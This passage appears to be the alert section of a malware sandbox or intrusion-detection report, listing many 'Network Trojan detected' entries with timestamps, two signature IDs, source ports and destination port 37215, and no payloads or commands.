          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.887487
          SID:2829579
          Source Port:37242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.794755
          SID:2835222
          Source Port:59740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764729
          SID:2835222
          Source Port:53998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.300080
          SID:2829579
          Source Port:60504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591711
          SID:2835222
          Source Port:58350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202761
          SID:2835222
          Source Port:36862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.229019
          SID:2829579
          Source Port:33670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.948631
          SID:2835222
          Source Port:39540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.400941
          SID:2835222
          Source Port:37358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178495
          SID:2835222
          Source Port:51874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.650614
          SID:2829579
          Source Port:56094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.225916
          SID:2829579
          Source Port:35276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.329974
          SID:2829579
          Source Port:49710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.140067
          SID:2829579
          Source Port:56800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.793588
          SID:2829579
          Source Port:58268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.552415
          SID:2835222
          Source Port:45990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322740
          SID:2829579
          Source Port:40208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528942
          SID:2835222
          Source Port:58930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.878857
          SID:2835222
          Source Port:57934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.464434
          SID:2829579
          Source Port:41668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272818
          SID:2829579
          Source Port:47722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.549216
          SID:2829579
          Source Port:59910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.115405
          SID:2835222
          Source Port:42284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.465160
          SID:2835222
          Source Port:35362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.739279
          SID:2835222
          Source Port:58178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.137916
          SID:2835222
          Source Port:58354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.223205
          SID:2829579
          Source Port:38674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.803207
          SID:2829579
          Source Port:39602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.628609
          SID:2835222
          Source Port:38876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.805351
          SID:2829579
          Source Port:49010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.817640
          SID:2835222
          Source Port:55396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.336694
          SID:2835222
          Source Port:43860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.778568
          SID:2835222
          Source Port:54996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102832
          SID:2835222
          Source Port:58310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.992851
          SID:2835222
          Source Port:55472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.770405
          SID:2835222
          Source Port:55640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.225472
          SID:2835222
          Source Port:47988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.997060
          SID:2835222
          Source Port:45770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178528
          SID:2835222
          Source Port:49838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.288027
          SID:2829579
          Source Port:42310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.560937
          SID:2835222
          Source Port:53394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.535710
          SID:2835222
          Source Port:40968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.964997
          SID:2835222
          Source Port:51462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.890723
          SID:2829579
          Source Port:33412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.727952
          SID:2829579
          Source Port:53598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.800663
          SID:2835222
          Source Port:53100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.021502
          SID:2829579
          Source Port:44868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.221761
          SID:2835222
          Source Port:48034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.630029
          SID:2829579
          Source Port:59908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.219900
          SID:2835222
          Source Port:42668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.743569
          SID:2835222
          Source Port:40874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.858816
          SID:2829579
          Source Port:40104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.426905
          SID:2835222
          Source Port:48450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.538893
          SID:2829579
          Source Port:33342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.471055
          SID:2835222
          Source Port:51212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.939284
          SID:2829579
          Source Port:45224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.350065
          SID:2829579
          Source Port:38154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.669255
          SID:2829579
          Source Port:38858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328047
          SID:2829579
          Source Port:52142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.680655
          SID:2829579
          Source Port:38442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.236893
          SID:2829579
          Source Port:45180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652928
          SID:2829579
          Source Port:42384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.164461
          SID:2829579
          Source Port:36876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.225938
          SID:2835222
          Source Port:43080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.293707
          SID:2835222
          Source Port:33340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.298192
          SID:2829579
          Source Port:41610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.551678
          SID:2829579
          Source Port:59918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.557240
          SID:2829579
          Source Port:51458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.241110
          SID:2835222
          Source Port:38404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594850
          SID:2829579
          Source Port:38136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.042047
          SID:2829579
          Source Port:36802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.799742
          SID:2835222
          Source Port:41586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764629
          SID:2829579
          Source Port:56632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.337008
          SID:2835222
          Source Port:41684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.485846
          SID:2835222
          Source Port:36998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.145520
          SID:2835222
          Source Port:41402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.871204
          SID:2835222
          Source Port:49800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.299873
          SID:2835222
          Source Port:35030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.237034
          SID:2829579
          Source Port:37326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.085307
          SID:2829579
          Source Port:58916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.818594
          SID:2829579
          Source Port:45498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.818039
          SID:2829579
          Source Port:47416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922690
          SID:2835222
          Source Port:56296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.732192
          SID:2835222
          Source Port:51634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.217097
          SID:2835222
          Source Port:43940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.077708
          SID:2829579
          Source Port:57708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.341964
          SID:2835222
          Source Port:34512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.615232
          SID:2835222
          Source Port:53244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271688
          SID:2829579
          Source Port:57104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.085475
          SID:2835222
          Source Port:52330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.617559
          SID:2829579
          Source Port:60810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.978385
          SID:2829579
          Source Port:54836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.597524
          SID:2829579
          Source Port:32812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.805533
          SID:2829579
          Source Port:43572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797892
          SID:2829579
          Source Port:51610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.399565
          SID:2835222
          Source Port:60922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.536531
          SID:2835222
          Source Port:46290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.227239
          SID:2835222
          Source Port:52418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.340239
          SID:2829579
          Source Port:47072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.819398
          SID:2835222
          Source Port:50006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.889861
          SID:2835222
          Source Port:33174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.214130
          SID:2829579
          Source Port:57652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.207085
          SID:2829579
          Source Port:45380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466313
          SID:2829579
          Source Port:48852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.230147
          SID:2829579
          Source Port:48302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.041394
          SID:2835222
          Source Port:39412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.126847
          SID:2835222
          Source Port:33244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.216550
          SID:2835222
          Source Port:42256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.736587
          SID:2835222
          Source Port:56260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.973988
          SID:2835222
          Source Port:57330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.320970
          SID:2829579
          Source Port:42590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.285871
          SID:2835222
          Source Port:51432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.627103
          SID:2829579
          Source Port:37966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.856263
          SID:2829579
          Source Port:45732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.160367
          SID:2829579
          Source Port:55648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.996163
          SID:2835222
          Source Port:37572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.492736
          SID:2835222
          Source Port:58410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.807176
          SID:2829579
          Source Port:55040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.916674
          SID:2829579
          Source Port:48994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.049058
          SID:2829579
          Source Port:47356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.667685
          SID:2835222
          Source Port:48002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.594785
          SID:2829579
          Source Port:60672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.729157
          SID:2829579
          Source Port:39888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.484047
          SID:2829579
          Source Port:37396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.760514
          SID:2829579
          Source Port:59582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.547341
          SID:2829579
          Source Port:34800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291944
          SID:2829579
          Source Port:49832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.932942
          SID:2829579
          Source Port:56400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.419939
          SID:2829579
          Source Port:39768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.772345
          SID:2829579
          Source Port:37122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.756159
          SID:2829579
          Source Port:35634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.143684
          SID:2835222
          Source Port:45552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.157547
          SID:2835222
          Source Port:55624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.010512
          SID:2829579
          Source Port:44754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.665237
          SID:2829579
          Source Port:43338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.948674
          SID:2829579
          Source Port:43666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.608611
          SID:2835222
          Source Port:42914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.780258
          SID:2829579
          Source Port:36676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.414731
          SID:2835222
          Source Port:38972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.818194
          SID:2835222
          Source Port:60672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.551050
          SID:2829579
          Source Port:44536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.669509
          SID:2835222
          Source Port:39050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.044505
          SID:2829579
          Source Port:44514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.989100
          SID:2835222
          Source Port:58382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.487028
          SID:2835222
          Source Port:35038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.859226
          SID:2829579
          Source Port:46658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.267930
          SID:2829579
          Source Port:59146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.890080
          SID:2835222
          Source Port:59538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.044562
          SID:2829579
          Source Port:56680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.209407
          SID:2829579
          Source Port:60602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.432522
          SID:2829579
          Source Port:60140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.142605
          SID:2835222
          Source Port:34150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299439
          SID:2829579
          Source Port:39432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.061113
          SID:2835222
          Source Port:37012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497112
          SID:2829579
          Source Port:39534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.958777
          SID:2835222
          Source Port:44448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324212
          SID:2835222
          Source Port:49610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.939236
          SID:2829579
          Source Port:55204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543040
          SID:2835222
          Source Port:38546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.842472
          SID:2835222
          Source Port:41432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.650299
          SID:2829579
          Source Port:51380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.590571
          SID:2829579
          Source Port:52076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.487623
          SID:2835222
          Source Port:36856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.668253
          SID:2829579
          Source Port:51412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.959741
          SID:2835222
          Source Port:33862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.141602
          SID:2835222
          Source Port:53186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.190309
          SID:2835222
          Source Port:33936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.129949
          SID:2829579
          Source Port:36894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.700447
          SID:2829579
          Source Port:45940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299611
          SID:2829579
          Source Port:52378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.617171
          SID:2829579
          Source Port:40210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.767120
          SID:2829579
          Source Port:38702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.809947
          SID:2835222
          Source Port:37938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271650
          SID:2829579
          Source Port:48118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.184123
          SID:2835222
          Source Port:58222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299540
          SID:2829579
          Source Port:56314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764210
          SID:2835222
          Source Port:38912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.712107
          SID:2829579
          Source Port:48650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.890445
          SID:2835222
          Source Port:43352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.822549
          SID:2835222
          Source Port:43314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.266878
          SID:2835222
          Source Port:51106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.679689
          SID:2835222
          Source Port:55610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.959935
          SID:2835222
          Source Port:57392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.401035
          SID:2835222
          Source Port:50918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.959080
          SID:2829579
          Source Port:46546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.221581
          SID:2829579
          Source Port:38368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.551176
          SID:2835222
          Source Port:36918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.629755
          SID:2835222
          Source Port:38820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.240660
          SID:2829579
          Source Port:52044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.115824
          SID:2829579
          Source Port:37292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.486336
          SID:2829579
          Source Port:51730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.417699
          SID:2829579
          Source Port:54042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.979324
          SID:2829579
          Source Port:36010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.840205
          SID:2829579
          Source Port:44432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.268554
          SID:2835222
          Source Port:38024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.159655
          SID:2829579
          Source Port:38100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.267984
          SID:2829579
          Source Port:44904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
